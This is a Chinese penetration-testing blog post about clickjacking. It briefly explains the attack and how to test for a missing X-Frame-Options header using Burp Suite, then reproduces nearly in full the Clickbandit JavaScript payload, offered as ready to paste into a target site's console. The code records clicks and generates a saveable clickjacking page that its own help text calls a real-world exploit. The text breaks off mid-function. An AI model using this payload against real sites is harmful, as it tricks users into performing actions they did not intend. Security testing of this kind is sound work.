点击劫持漏洞

这篇具有很好参考价值的文章主要介绍了点击劫持漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

渗透测试成长篇-点击劫持漏洞

1.前言

点击劫持就是一种视觉上的欺骗手段,攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上,攻击者常常配合社工手段完成攻击。(一般能被劫持就是网站缺少X-FRAME-OPTIONS)

************  点击劫持一般在渗透测试中比较常见

2.过程

如何测试,有两种方法,今天就讲一种最简单常用的方式(burpsuite模块)

在这里就用测过的一个站点做例子吧

1)这是一个正常的站点点击劫持漏洞

 

 2)我们需要打开burpsuite,选择burp模块,再去选择一个点击劫持模块点击劫持漏洞

 点击劫持漏洞

 

3)复制payload,然后打开刚才的站点,选择开发者模式点击劫持漏洞

 

4)把复制的payload粘贴到console模块点击劫持漏洞

 

5)payload如下,可以直接使用

/* Copyright PortSwigger Ltd. All rights reserved. Usage is subject to the Burp Suite license terms. See https://portswigger.net for more details. */
!function(){
    var initialZoomFactor = '1.0', win, doc, width, height, clicks = [];
    function addClickTrap(element, minusY) {
        var clickTrap = doc.createElement('div'), cords = findPos(element);
        clickTrap.style.backgroundColor = 'none';
        clickTrap.style.border = 'none';
        clickTrap.style.position = 'absolute';
        clickTrap.style.left = cords[0] + 'px';
        clickTrap.style.top = cords[1] + 'px';
        clickTrap.style.width = element.offsetWidth + 'px';
        clickTrap.style.height = element.offsetHeight + 'px';
        if(element.zIndex || element.zIndex === '0') {
            clickTrap.style.zIndex = +element.zIndex+1;
        }
        clickTrap.style.opacity = '0.5';
        clickTrap.style.cursor = 'pointer';
        clickTrap.clickTrap = 1;
        clickTrap.addEventListener('click', function(e) {
            generatePoc({x:e.pageX, y: minusY?e.pageY-minusY : e.page});
            e.preventDefault();
            e.stopPropagation();
            return false;
        }, true);
        doc.body.appendChild(clickTrap);
    }
    function addMessage(msg) {
        var message = document.createElement('div');
            message.style.width = '100%';
            message.style.height = '20px';
            message.style.backgroundColor = '#fff5bf';
        message.style.border = '1px solid #ff9900';
        message.style.padding = '5px';
        message.style.position = 'fixed';
        message.style.bottom = '0';
        message.style.left = '0';
        message.style.zIndex = 100000;
        message.style.textAlign = 'center';
        message.style.fontFamily = 'Arial';
        message.style.color = '#000';
        message.appendChild(document.createTextNode(msg));
        document.body.appendChild(message);
        setTimeout(function() {
            document.body.removeChild(message);
        }, 4000);
    }
    function htmlEscape(str) {
        str = str + '';
        return str.replace(/[^\w :\-\/.?=]/gi, function(c){
            return '&#' + (+c.charCodeAt(0))+';';
        });
    }
    function getDocHeight(D) {
        return Math.max(
            D.body.scrollHeight, D.documentElement.scrollHeight,
            D.body.offsetHeight, D.documentElement.offsetHeight,
            D.body.clientHeight, D.documentElement.clientHeight
        );
    }
    function getDocWidth(D) {
        return Math.max(
            D.body.scrollWidth, D.documentElement.scrollWidth,
            D.body.offsetWidth, D.documentElement.offsetWidth,
            D.body.clientWidth, D.documentElement.clientWidth
        );
    }
    function findPos(obj) {
        var left = 0, top = 0;
        if(obj.offsetParent) {
            while(1) {
              left += obj.offsetLeft;
              top += obj.offsetTop;
              if(!obj.offsetParent) {
                break;
              }
              obj = obj.offsetParent;
            }
        } else if(obj.x && obj.y) {
            left += obj.x;
            top += obj.y;
        }
        return [left,top];
      }
    function generatePoc(config) {
        var html = '', child = '', elementWidth = 1, elementHeight = 1, maxWidth = width, maxHeight = height, cords, zoomIncrement = 1, desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight,
            element = config.element, x = config.x, y = config.y, pixelMode = false;
        if(config.clickTracking) {
            elementWidth = config.clickTracking[0].width;
            elementHeight = config.clickTracking[0].height;
            x = config.clickTracking[0].left;
            y = config.clickTracking[0].top;
            zoomIncrement = 1;
            config.currentPosition = 0;
        } else {
            config.clickTracking = [];
            if(element) {
                elementWidth = element.offsetWidth;
                elementHeight = element.offsetHeight;
                cords = findPos(element);
                x = cords[0];
                y = cords[1];
                zoomIncrement = 1;
            } else {
                zoomIncrement = 5;
                pixelMode = true;
            }
        }
        parentOffsetWidth = desiredX - x;
        parentOffsetHeight = desiredY - y;
        child = btoa('<script>window.addEventListener("message", function(e){ var data, childFrame = document.getElementById("childFrame"); try { data = JSON.parse(e.data); } catch(e){ data = {}; } if(!data.clickbandit){ return false; } childFrame.style.width = data.docWidth+"px";childFrame.style.height = data.docHeight+"px";childFrame.style.left = data.left+"px";childFrame.style.top = data.top+"px";}, false);<\/script><iframe src="'+htmlEscape(self.location)+'" scrolling="no" style="width:'+(+maxWidth)+'px;height:'+(+maxHeight)+'px;position:absolute;left:'+parentOffsetWidth+'px;top:'+parentOffsetHeight+'px;border:0;" frameborder="0" '+(window.clickbandit.sandbox?'sandbox="allow-same-origin    '+htmlEscape(document.getElementById('sandboxIframeInput').value)+'" ':'')+'id="childFrame" οnlοad="parent.postMessage(JSON.stringify({clickbandit:1}),\'*\')"><\/iframe>');
        html += '<body>\n';
        html += '<div id="container" style="clip-path:none;clip:auto;overflow:visible;position:absolute;left:0;top:0;width:100%;height:100%">\n';
        html += '<!-- Clickjacking PoC Generated by Burp Suite Professional -->\n';
        html += '<input id="clickjack_focus" style="opacity:0;position:absolute;left:-5000px;">\n';
        html += '<div id="clickjack_button" style="opacity:0;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;text-align:center;font-family:Arial;font-size:100%;width:'+elementWidth+'px;height:'+elementHeight+'px;z-index:0;background-color:red;color:#fff;position:absolute;left:'+(+desiredX)+'px;top:'+(+desiredY)+'px"><div style="position:relative;top: 50%;transform: translateY(-50%);">Click<\/div><\/div>\n';
        html += '<!-- Show this element when clickjacking is complete -->\n';
        html += '<div id="clickjack_complete" style="display:none;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;font-family:Arial;font-size:16pt;color:red;text-align:center;width:100%;height:100%;"><div style="position:relative;top: 50%;transform: translateY(-50%);">You\'ve been clickjacked!<\/div></div>\n';
        html += '<iframe id="parentFrame" src="data:text/html;base64,'+child+'" frameborder="0" scrolling="no" style="-ms-transform: scale('+initialZoomFactor+');-ms-transform-origin: '+desiredX+'px '+desiredY+'px;transform: scale('+initialZoomFactor+');-moz-transform: scale('+initialZoomFactor+');-moz-transform-origin: '+desiredX+'px '+desiredY+'px;-o-transform: scale('+initialZoomFactor+');-o-transform-origin: '+desiredX+'px '+desiredY+'px;-webkit-transform: scale('+initialZoomFactor+');-webkit-transform-origin: '+desiredX+'px '+desiredY+'px;opacity:0.5;border:0;position:absolute;z-index:1;width:'+maxWidth+'px;height:'+maxHeight+'px;left:0px;top:0px"><\/iframe>\n';
        if(pixelMode) {
            html += '<svg id="circle" style="position:absolute;z-index:0;left:'+(desiredX-100)+'px;top:'+(desiredY-50)+'px;"><circle cx="100" cy="50" r="40" stroke="red" fill="none" stroke-width="1" /></svg>';
        }
        html += '</div>\n';
        function generateClickArea(pos) {
            var elementWidth, elementHeight, x, y, parentFrame = document.getElementById('parentFrame'), desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight, docWidth, docHeight,
                btn = document.getElementById('clickjack_button');
            if(pos < window.clickbandit.config.clickTracking.length) {
                clickjackCompleted(false);
                elementWidth = window.clickbandit.config.clickTracking[pos].width;
                elementHeight = window.clickbandit.config.clickTracking[pos].height;
                btn.style.width = elementWidth + 'px';
                btn.style.height = elementHeight + 'px';
                window.clickbandit.elementWidth = elementWidth;
                window.clickbandit.elementHeight = elementHeight;
                x = window.clickbandit.config.clickTracking[pos].left;
                y = window.clickbandit.config.clickTracking[pos].top;
                docWidth = window.clickbandit.config.clickTracking[pos].documentWidth;
                docHeight = window.clickbandit.config.clickTracking[pos].documentHeight;
                parentOffsetWidth = desiredX - x;
                parentOffsetHeight = desiredY - y;
                parentFrame.style.width = docWidth+'px';
                parentFrame.style.height = docHeight+'px';
                parentFrame.contentWindow.postMessage(JSON.stringify({clickbandit: 1, docWidth: docWidth, docHeight: docHeight, left: parentOffsetWidth, top: parentOffsetHeight}),'*');
                calculateButtonSize(getFactor(parentFrame));
                showButton();
                if(parentFrame.style.opacity === '0') {
                    calculateClip();
                }
            } else {
                resetClip();
                hideButton();
                clickjackCompleted(true);
            }
        }
        function handleMessages(e){
            var data;
            try {
                data = JSON.parse(e.data);
            } catch(e){
                data = {};
            }
            if(!data.clickbandit) {
                return false;
            }
            showButton();
        }
        function clickjackCompleted(show) {
            var complete = document.getElementById('clickjack_complete');
            if(show) {
                complete.style.display = 'block';
            } else {
                complete.style.display = 'none';
            }
        }
        function showButton() {
            var btn = document.getElementById('clickjack_button');
            btn.style.opacity = 1;
        }
        function hideButton() {
            var btn = document.getElementById('clickjack_button');
            btn.style.opacity = 0;
        }
        html += '<script>';
        html += findPos;
        html += generateClickArea;
        html += hideButton;
        html += showButton;
        html += clickjackCompleted;
        html += 'window.addEventListener("message", '+handleMessages+',false);';
        html += 'window.addEventListener("blur", function(){ if(window.clickbandit.mouseover) { hideButton();setTimeout(function(){ generateClickArea(++window.clickbandit.config.currentPosition);document.getElementById("clickjack_focus").focus();},1000); } }, false);';
        html += 'document.getElementById("parentFrame").addEventListener("mouseover",function(){ window.clickbandit.mouseover = true; }, false);';
        html += 'document.getElementById("parentFrame").addEventListener("mouseout",function(){ window.clickbandit.mouseover = false; }, false);';
        html += '<\/script>';
        html += '<script>';
        html += 'window.clickbandit={mode: "review", mouseover:false,elementWidth:'+elementWidth+',elementHeight:'+elementHeight+',config:'+JSON.stringify(config)+'};';
        html += calculateClip;
        html += calculateButtonSize;
        html += resetClip;
        html += getFactor;
        html += '<\/script>';
        function getFactor(obj) {
            if(typeof obj.style.transform === 'string') {
                return obj.style.transform.replace(/[^\d.]/g,'');
            }
            if(typeof obj.style.msTransform === 'string') {
                return obj.style.msTransform.replace(/[^\d.]/g,'');
            }
            if(typeof obj.style.MozTransform === 'string') {
                return obj.style.MozTransform.replace(/[^\d.]/g,'');
            }
            if(typeof obj.style.oTransform === 'string') {
                return obj.style.oTransform.replace(/[^\d.]/g,'');
            }
            if(typeof obj.style.webkitTransform === 'string') {
                return obj.style.webkitTransform.replace(/[^\d.]/g,'');
            }
            return 1;
        }
        function calculateButtonSize(factor) {
            var btn = document.getElementById('clickjack_button'), resizedWidth = Math.round(window.clickbandit.elementWidth * factor), resizedHeight = Math.round(window.clickbandit.elementHeight * factor);
            btn.style.width = resizedWidth + 'px';
            btn.style.height = resizedHeight + 'px';
            if(factor > 100) {
                btn.style.fontSize = '400%';
            } else {
                btn.style.fontSize = (factor * 100) + '%';
            }
        }
        function calculateClip() {
            var btn = document.getElementById('clickjack_button'), w = btn.offsetWidth, h = btn.offsetHeight, container = document.getElementById('container'), x = btn.offsetLeft, y = btn.offsetTop;
            container.style.overflow = 'hidden';
            container.style.clip = 'rect('+y+'px, '+(x+w)+'px, '+(y+h)+'px, '+x+'px)';
            container.style.clipPath = 'inset('+y+'px '+(x+w)+'px '+(y+h)+'px '+x+'px)';
        }
        function resetClip() {
            var container = document.getElementById('container');
            container.style.overflow = 'visible';
            container.style.clip = 'auto';
            container.style.clipPath = 'none';
        }
        html += '<!-- Configuration -->\n';
        function toggleTransparency() {
            var parentFrame=document.getElementById('parentFrame');
            if(parentFrame.style.opacity === '0.5') {
                parentFrame.style.opacity=0.0001;
                calculateClip();
            } else {
                parentFrame.style.opacity=0.5;
                resetClip();
            }
        }
        function transform(element, property, amount) {
            var factor = 1;
            element.style[property] = element.style[property].replace(/[\d.]+/,function(d){
                d = +d;
                if(amount < 0) {
                    if(d === 1) {
                        factor = d;
                        return factor;
                    }
                    factor = d-Math.abs(amount);
                    return factor;
                } else {
                    factor = d+amount;
                    return factor;
                }
            });
            return factor;
        }
        function zoom(amount) {
            var parentFrame=document.getElementById('parentFrame'), factor = 1,
                circle = document.getElementById('circle');
            if(typeof parentFrame.style.transform === 'string') {
                factor = transform(parentFrame, 'transform', amount);
            }
            if(typeof parentFrame.style.msTransform === 'string') {
                factor = transform(parentFrame, 'msTransform', amount);
            }
            if(typeof parentFrame.style.MozTransform === 'string') {
                factor = transform(parentFrame, 'MozTransform', amount);
            }
            if(typeof parentFrame.style.oTransform === 'string') {
                factor = transform(parentFrame, 'oTransform', amount);
            }
            if(typeof parentFrame.style.webkitTransform === 'string') {
                factor = transform(parentFrame, 'webkitTransform', amount);
            }
            if(factor) {
                calculateButtonSize(factor);
            }
            if(circle) {
                if(factor === 1) {
                    circle.style.display = "block";
                } else {
                    circle.style.display = "none";
                }
            }
            if(parentFrame.style.opacity === '0') {
                calculateClip();
            } else {
                resetClip();
            }
        }
        function moveIframe(e) {
            var parentFrame = document.getElementById('parentFrame'), arrow = false;
            switch(e.keyCode) {
                case 37:
                    parentFrame.style.left = ((parseInt(parentFrame.style.left.replace(/[^\d-]+/,'')))-1)+'px';
                    arrow = true;
                break;
                case 38:
                    parentFrame.style.top = ((parseInt(parentFrame.style.top.replace(/[^\d-]+/,'')))-1)+'px';
                    arrow = true;
                break;
                case 39:
                    parentFrame.style.left = ((parseInt(parentFrame.style.left.replace(/[^\d-]+/,'')))+1)+'px';
                    arrow = true;
                break;
                case 40:
                    parentFrame.style.top = ((parseInt(parentFrame.style.top.replace(/[^\d-]+/,'')))+1)+'px';
                    arrow = true;
                break;
            }
            if(arrow) {
                e.preventDefault();
            }
        }
        html += '<script>';
        html += addMessage+createStyles+generateCssString+createHeader+toggleTransparency+zoom+transform+moveIframe+';document.addEventListener("keydown",moveIframe,false);addMessage("Use the controls above to control the zoom and transparency.");createStyles(document, document.body);createHeader(document, document.body);';
        html += '<\/script>';
        html += '<style>#menu { position:absolute;left:210px;top:25px;z-index:10000;font-family:Arial;margin:0;padding:0;list-style:none; } #menu li {float:left;margin-right:5px;}</style>';
        html += '<ul id="menu">';
        html += '<li><a href="#" οnclick="zoom('+(zoomIncrement*-1)+');return false;" class="btn">-</a></li>';
        html += '<li><a href="#" οnclick="zoom('+zoomIncrement+');return false;" class="btn">+</a></li>';
        html += '<li><a href="#" οnclick="toggleTransparency();return false;" class="btn">Toggle transparency<\/a></li>';
        html += '<li><a href="#" οnclick="self.location.reload();return false;" class="btn">Reset<\/a></li>';
        html += '<li><a href="#" οnclick="generateClickArea(window.clickbandit.config.currentPosition=0);document.getElementById(\'clickjack_complete\').style.display=\'none\';this.href=\'data:text/html;base64,\'+btoa(document.body.innerHTML.replace(/<![-]{2} Configuration [-]{2}>[\\d\\D]+$/,\'\'))" download="clickjacked.html" class="btn">Save</a></li>';
        html += '</ul>';
        html += '</body>';
        document.write(html);
    }
    function start() {
        var frame = document.getElementById('clickbandit_frame');
        if(window.clickbandit.sandbox) {
            frame.sandbox = 'allow-same-origin ' + document.getElementById('sandboxIframeInput').value;
            if(!/allow-scripts/i.test(document.getElementById('sandboxIframeInput').value)) {
                    win = window;
                    doc = document;
                    addClickTrap(frame, 70);
            }
        } else {
            frame.removeAttribute('sandbox');
        }
        win = frame.contentWindow;
        doc = win.document;
        win.location = location+'';
        addMessage('Please click on the elements you wish to clickjack. Then click finish.');
        clicks = [];
    }
    function recordClicks(element, x, y) {
        var cords = findPos(element);
        clicks.push({
            width: element.offsetWidth,
            height: element.offsetHeight,
            mouseX: x,
            mouseY: y,
            left: cords[0],
            top: cords[1],
            documentWidth: getDocWidth(doc),
            documentHeight: getDocHeight(doc)
        });
    }
    function finish() {
        if(clicks.length) {
            generatePoc({clickTracking: clicks});
        } else {
            alert("You need to click on some elements first.");
        }
    }
    function interceptClicks() {
        var elements, i;
        elements = doc.querySelectorAll('iframe,embed,object,applet');
        for(i=0;i<elements.length;i++) {
            addClickTrap(elements[i]);
        }
        win.addEventListener('click', function(e) {
            var element = e.target || e.srcElement;
            if(element.clickTrap || element === document.body) {
                return false;
            }
            recordClicks(element,e.pageX,e.pageY);
            if(window.clickbandit.disableClickActions) {
                e.preventDefault();
                e.stopPropagation();
                return false;
            }
        }, true);
    }
    function removeNodes(node) {
        while(node.firstChild) {
            node.removeChild(node.firstChild);
        }
    }
    function createHeader(doc, node) {
        var header = doc.createElement('div'), bar = doc.createElement('div'), logoContainer = doc.createElement('div'), clickBanditLogo = doc.createElement('img'),
            anchor = doc.createElement('a'), help = doc.createElement('a'), mode = doc.createElement('h1');
        header.style.position = 'relative';
        header.style.zIndex = 10000;
        logoContainer.style.backgroundColor = '#fff';
        logoContainer.style.width = '100%';
        logoContainer.style.height = '70px';
        clickBanditLogo.src = 'data:image/png;base64,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';
        clickBanditLogo.style.cssFloat = 'left';
        clickBanditLogo.style.width = '200px';
        clickBanditLogo.style.height = '23px';
        clickBanditLogo.style.position = 'relative';
        clickBanditLogo.style.top = '22px';
        clickBanditLogo.style.left = '5px';
        anchor.href = 'https://portswigger.net/burp/help/suite_functions_clickbandit.html';
        anchor.target = '_blank';
        anchor.appendChild(clickBanditLogo);
        logoContainer.appendChild(anchor);
        header.appendChild(logoContainer);
        bar.style.backgroundColor = '#f4983b';
        bar.style.width = '100%';
        bar.style.height = '10px';
        bar.style.clear = 'both';
        header.appendChild(bar);
        node.appendChild(header);
        help.href = '#';
        help.onclick = function() {
            var contents = '<style>'+generateCssString()+'body{margin:10px;}</style>', win;
            contents += '<p style="float:right"><a href="#" οnclick="self.close()" class="btn">Close</a></p>';
            if(window.clickbandit.mode === 'record') {
                contents += '<h1><span>Record mode</span></h1>';
                contents += '<p>Burp Clickbandit first loads in record mode. Click start to load the site. Perform one or more mouse clicks to record your clickjacking attack. Typically, this will involve performing the mouse clicks that the victim user needs to perform to carry out some desired action.</p>';
                contents += '<p>By default, as clicks are recorded, they are also handled in the normal way by the target page. You can use the "disable click actions" checkbox to record clicks without the target page handling them.</p>';
                contents += '<p>You can click the sandbox iframe checkbox to add the sandbox attribute to the iframe, this option will allow you to avoid frame busters.</p>';
                contents += '<p>When you have finished recording, click the "Finish" button to enter review mode.</p>';
            } else {
                contents += '<h1><span>Review Mode</span></h1>';
                contents += '<p>When you have finished recording your attack, Burp Clickbandit enters review mode. This lets you review the generated attack, with the attack UI overlaid on the original page UI. You can click the buttons on the attack UI to verify that the attack works.</p>';
                contents += '<p>The following commands are available in review mode:</p>';
                contents += '<ul>';
                contents += '<li>The + and - buttons can be used to zoom in and out.</li>';
                contents += '<li>The "toggle transparency" button lets you show or hide the original page UI.</li>';
                contents += '<li>The "reset" button restores the generated attack, as it was before any further clicks were made.</li>';
                contents += '<li>The "save" button saves an HTML file containing the attack. This can be used as a real-world exploit of the clickjacking vulnerability.</li>';
                contents += '<li>You can use the keyboard arrow keys to reposition the attack UI if is not correctly aligned with the original page UI.</li>';
                contents += '</ul>';
            }
            win = window.open('about:blank','help','width=500,height=500');
            win.document.write(contents);
        };
        help.className = 'btn';
        help.style.position = 'absolute';
        help.style.right = '10px';
        help.style.top = '15px';
        help.appendChild(doc.createTextNode("?"));
        if(window.clickbandit && window.clickbandit.mode === 'record') {
            mode.appendChild(doc.createTextNode('Record mode'));
        } else {
            mode.appendChild(doc.createTextNode('Review mode'));
        }
        mode.style.position = 'absolute';
        mode.style.right = '50px';
        mode.style.top = '0px';
        header.appendChild(help);
        header.appendChild(mode);
        return header;
    }
    function createMenu(node) {
        var div = document.createElement('div'), div2 = document.createElement('div');
        div.style.position = 'absolute';
        div.style.left = '210px';
        div.style.top = '25px';
        div.style.backgroundColor = '#fff';
        div.style.color = '#000';
        div.innerHTML = '<form><ul id="menu"><li><input type="checkbox" id="sandboxIframeCheckbox" οnclick="var iframeInput=document.getElementById(\'sandboxIframeInput\');if(this.checked){ iframeInput.style.display=\'block\';window.clickbandit.sandbox = true; } else { iframeInput.style.display=\'none\';window.clickbandit.sandbox = false; }" /><label>Sandbox iframe?</label><input style="display:none" type="text" value="allow-scripts allow-forms" id="sandboxIframeInput" /></li><li><a href="#" class="btn" οnclick="clickbandit.start();return false;">Start</a></li><li><a href="#" class="btn" οnclick="clickbandit.finish();return false;">Finish</a></li></ul></form>';
        node.appendChild(div);
        div2.style.position = 'absolute';
        div2.style.top = '40px';
        div2.style.right = '50px';
        div2.innerHTML = '<input type="checkbox" id="disableClickActions" οnclick="if(this.checked){ window.clickbandit.disableClickActions = true; } else { window.clickbandit.disableClickActions = false; }" /> <label style="color:#000;" for="disableClickActions">Disable click actions</label>';
        node.appendChild(div2);
    }
    function disableStyles() {
        var i, j, styleSheet, rule, xDomain;
        for(var i=0;i<document.styleSheets.length;i++) {
            styleSheet = document.styleSheets[i];
            styleSheet.disabled = true;
        }
    }
    function generateCssString() {
        var css = '';
            css += 'body {';
            css += 'font-family:Arial;';
            css += 'margin:0;';
            css += 'padding:0;';
            css += '}';
            css += '#menu {';
            css += 'float:right;';
            css += 'margin:0;';
            css += 'padding:0;';
            css += 'list-style:none;';
            css += 'background-color:#fff;';
            css += '}';
            css += '#menu li {';
            css += 'float:left;margin-right:10px;';
            css += '}';
            css += '.btn {';
              css += 'background: #f4973a;';
              css += 'background-image: -webkit-linear-gradient(top, #f4973a, #e06228);';
              css += 'background-image: -moz-linear-gradient(top, #f4973a, #e06228);';
              css += 'background-image: -ms-linear-gradient(top, #f4973a, #e06228);';
              css += 'background-image: -o-linear-gradient(top, #f4973a, #e06228);';
